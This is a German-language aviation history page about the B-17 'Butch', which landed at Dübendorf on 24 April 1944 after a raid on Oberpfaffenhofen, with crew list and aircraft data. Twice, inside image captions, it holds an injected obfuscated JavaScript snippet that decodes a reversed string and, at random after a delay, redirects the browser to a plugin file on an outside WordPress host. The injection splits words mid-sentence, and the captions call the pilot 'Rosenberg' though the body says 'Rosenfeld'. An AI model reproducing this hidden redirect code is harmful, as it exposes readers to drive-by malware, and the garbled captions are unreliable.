Ereignisse

Über die Piste hinaus gerollt

Der Bomber mit dem Kennzeichen JW-S und dem Übernamen „Butch“ ist nach einem Einsatz über Oberpfaffenhofen in Dübendorf gelandet und in der Schweiz verschrottet worden.

Der Kinn- und der Kugeldrehturm wurden bei der L<script type=

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andung zerstört, als Rosenberg das Fahrwerk einzog, damit die Maschine nicht die Piste überrollte. (267_1)“ width=“800″ height=“311″ /> Der Kinn- und der Kugeldrehturm wurden bei der Landung zerstört, als Rosenberg das Fahrwerk einzog, damit die Maschine nicht die Piste überrollte. (267_1)

Der Bomber der 8th Air Force, 92nd Bomb Group mit dem Kennzeichen JW-S und dem Übernamen „Butch“ ist nach einem Einsatz über Oberpfaffenhofen in Dübendorf gelandet und in der Schweiz verschrottet worden. Die Fortress wurde von 2Lt Bernard Rosenfeld und seinem Copiloten 1Lt Gerald H. Robson jr. geflogen. Nachdem die Bomben abgeworfen waren, wurde die Formation von deutschen Jägern angegriffen. Butch fiel langsam hinter die Formation zurück. Bei der Landung in Dübendorf wurde die Maschine beschädigt, als der Pilot das Fahrwerk einzog bevor das Flugzeug über die Piste hinausrollte. Am 16. Mai 1944 wurde die Maschine demontiert und in Kloten eingelagert.

Diese B-17 bef<script type=

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and sich auf dem vierten Einsatz, wie an den Bombensymbolen hinter der Bugschützenkanzel zu sehen ist. (267_2)“ width=“800″ height=“428″ /> Diese B-17 befand sich auf dem vierten Einsatz, wie an den Bombensymbolen hinter der Bugschützenkanzel zu sehen ist. (267_2)


Ereignissdatum 24.4.1944
Ort Dübendorf
Kanton ZH
Ereignis Landung
Nation Amerika
Flugzeugart Bomber
Flugzeugtyp B-17 Flying Fortress
Flugzeugbezeichnung B-17 G-30-BO
Flugzeug-Spitzname Butch
Einteilung 8th Air Force, 92nd Bomb Group, 326th Squadron
Basis Podington (GB)
Auftrag Bombardierung
Einsatzziel Oberpfaffenhofen (D)
Rückkehr in der Schweiz verschrottet
Werknummer 42-31914
Kennzeichen JW-S
CH Archiv Nr. A058
US MACR Nr. 4147
Besatzung Pilot: Bernard Rosenfeld, 2nd Lt
Copilot: Gerald H. Robson, Jr., 1st Lt
Navigator: John E. Launius, 2nd Lt
Bombardier:Eugene J. Metz, 2nd Lt
Engineer: Walter B. Nicodemus, Sgt
Radio: William D. Petrie, S/Sgt
Ball Turret: Claude R. Morehead, Pvt
Right Waist: Raymond H. Schuster, Sgt
Left Waist: Walter J. Wisniewski, Sgt
Tail Gunner: James W. Cook, Sgt
Quelle Cockpit
Autor Hans-Heiri Stapfer